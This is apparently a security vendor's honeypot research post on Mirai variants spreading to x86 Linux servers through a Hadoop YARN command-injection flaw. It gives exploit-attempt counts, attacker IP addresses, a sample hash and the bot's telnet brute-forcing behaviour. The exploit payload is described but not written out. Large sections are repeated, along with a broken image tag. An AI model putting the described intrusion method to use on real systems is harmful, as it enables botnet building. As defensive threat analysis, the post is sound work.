Mirai: Not Just for IoT Anymore
- Linux servers in datacenters have access to more bandwidth than IoT devices on residential networks, making them much more efficient DDoS bots. A handful of well-resourced Linux servers can generate attacks that compete with a much larger IoT botnet.
- Linux servers in datacenters have access to more bandwidth than IoT devices on residential networks, making them much more efficient DDoS bots. A handful of well-resourced Linux servers can generate attacks that compete with a much larger IoT botnet.
Details
The Hadoop YARN vulnerability is relatively simple – a command injection flaw that allows the attacker to execute arbitrary shell commands. Last month, Radware discovered this vulnerability being used to install the DemonBot DDoS bot. In many ways this flaw is similar to others we’ve seen exploited in IoT devices. For instance, CVE-2014-8361, a flaw in Realtek’s UPnP SOAP interface, is also exploitable by sending an HTTP request to a special port with specific parameters to induce the execution of shell commands. The Realtek vulnerability was used to deliver a Mirai variant. Our global network of honeypots has been tracking attempts to exploit the Hadoop YARN vulnerability. As seen in Fig 1, there are tens of thousands of exploit attempts per day.
Fig 1: Number of Hadoop YARN Exploits Attempts What’s surprising is that so many exploit attempts are being delivered by only a handful of unique sources.
Fig 2 shows the number of unique source IP addresses delivering the Hadoop YARN exploit over the same time period. 
Fig 2: Number of Unique Sources
If we look at the top 5 User-Agents delivering these exploits in Fig 3, we can see the attackers using the Python requests library to deliver the HTTP payload.
Fig 3: The huge number of exploit attempts, coming from a small number of sources, coupled with the fact that none of the malware payloads we’ve seen try to propagate in a worm-able fashion using the Hadoop YARN exploit, and none of the payloads are written in Python, leads us to speculate that a small number of attackers are manually scanning the Internet to exploit this vulnerability. The exploit payloads we’ve seen, as shown in Fig 4, are all functionality identical – pull down a malware binary from a URL and execute it.
Fig 4: Typical Exploit What does differ is which malware is delivered in the exploit. For the month of November, we’ve seen 225 unique binaries being delivered. 152 - well over half - of the binaries are being delivered by just one source address. At least a dozen of the samples we’ve examined are clearly variants of Mirai.
Fig 5: “VPNFilter” Mirai Variant
Let’s focus on a Mirai variant that calls itself “VPNFilter” (2bcca8ac8d4d80f6740ef14d521284c0, Fig 5), even though it has nothing to do with the more advanced IoT bot. Across our honeypot network, we saw this exploit being delivered by two source addresses on Nov 16 - 185.244.25.241 and 104.248.170.199. The command-and-control site for this bot is the same IP address that hosts the binary. This particular variant differs from an IoT Mirai in an important way - it only delivers the x86 version of the bot. IoT Mirai variants will poke around a potential victim in order to deliver an executable that’s suitable for its CPU architecture – x86, x64, ARM, MIPS, ARC, etc. This version assumes the Hadoop YARN service is running on a commodity x86 Linux server. When running the “VPNFilter” variant in a sandbox, we immediately noticed it still tries to brute-force factory default usernames and passwords via telnet. If it successfully finds a vulnerable device, instead of directly installing the malware on the victim, it reports the IP address, username, and password to a reporting server, where the attacker can automate the installation of the bot.
Conclusion
Mirai is no longer solely targeting IoT devices. While the techniques used to deliver Mirai to both IoT and Linux servers may be similar, it’s much easier for attackers to attack the x86 monoculture of Linux servers than the wide array of CPUs used in IoT devices. The limited number of sources we’ve seen continually scanning for the Hadoop YARN vulnerability may indicate this activity is the work of a small group of attackers. Their goal is clear – to install the malware on as many devices as possible. Once gaining a foothold, Mirai on a Linux server behaves much like an IoT bot and begins brute-forcing telnet usernames and passwords. What’s different now is that among the small, diminutive devices in the botnet lurk fully powered Linux servers.
Fig 1: Number of Hadoop YARN Exploits Attempts What’s surprising is that so many exploit attempts are being delivered by only a handful of unique sources.
Fig 2 shows the number of unique source IP addresses delivering the Hadoop YARN exploit over the same time period.
Fig 2: Number of Unique Sources
If we look at the top 5 User-Agents delivering these exploits in Fig 3, we can see the attackers using the Python requests library to deliver the HTTP payload.
Fig 3: The huge number of exploit attempts, coming from a small number of sources, coupled with the fact that none of the malware payloads we’ve seen try to propagate in a worm-able fashion using the Hadoop YARN exploit, and none of the payloads are written in Python, leads us to speculate that a small number of attackers are manually scanning the Internet to exploit this vulnerability. The exploit payloads we’ve seen, as shown in Fig 4, are all functionality identical – pull down a malware binary from a URL and execute it.
img alt="Typical Exploit" data-entity-type="file" data-entity-uuid="8c1d912a-1633-4240-a4fd-daa84e60e8a9" src="/sites/default/files/inline-images/Typical%20Exploit.png" />
Fig 4: Typical Exploit What does differ is which malware is delivered in the exploit. For the month of November, we’ve seen 225 unique binaries being delivered. 152 - well over half - of the binaries are being delivered by just one source address. At least a dozen of the samples we’ve examined are clearly variants of Mirai.
Fig 5: “VPNFilter” Mirai Variant
Let’s focus on a Mirai variant that calls itself “VPNFilter” (2bcca8ac8d4d80f6740ef14d521284c0, Fig 5), even though it has nothing to do with the more advanced IoT bot. Across our honeypot network, we saw this exploit being delivered by two source addresses on Nov 16 - 185.244.25.241 and 104.248.170.199. The command-and-control site for this bot is the same IP address that hosts the binary. This particular variant differs from an IoT Mirai in an important way - it only delivers the x86 version of the bot. IoT Mirai variants will poke around a potential victim in order to deliver an executable that’s suitable for its CPU architecture – x86, x64, ARM, MIPS, ARC, etc. This version assumes the Hadoop YARN service is running on a commodity x86 Linux server. When running the “VPNFilter” variant in a sandbox, we immediately noticed it still tries to brute-force factory default usernames and passwords via telnet. If it successfully finds a vulnerable device, instead of directly installing the malware on the victim, it reports the IP address, username, and password to a reporting server, where the attacker can automate the installation of the bot.
Conclusion
Mirai is no longer solely targeting IoT devices. While the techniques used to deliver Mirai to both IoT and Linux servers may be similar, it’s much easier for attackers to attack the x86 monoculture of Linux servers than the wide array of CPUs used in IoT devices. The limited number of sources we’ve seen continually scanning for the Hadoop YARN vulnerability may indicate this activity is the work of a small group of attackers. Their goal is clear – to install the malware on as many devices as possible. Once gaining a foothold, Mirai on a Linux server behaves much like an IoT bot and begins brute-forcing telnet usernames and passwords. What’s different now is that among the small, diminutive devices in the botnet lurk fully powered Linux servers.
- Attacks and DDoS Attacks
- Botnets
- Honeypots
- Malware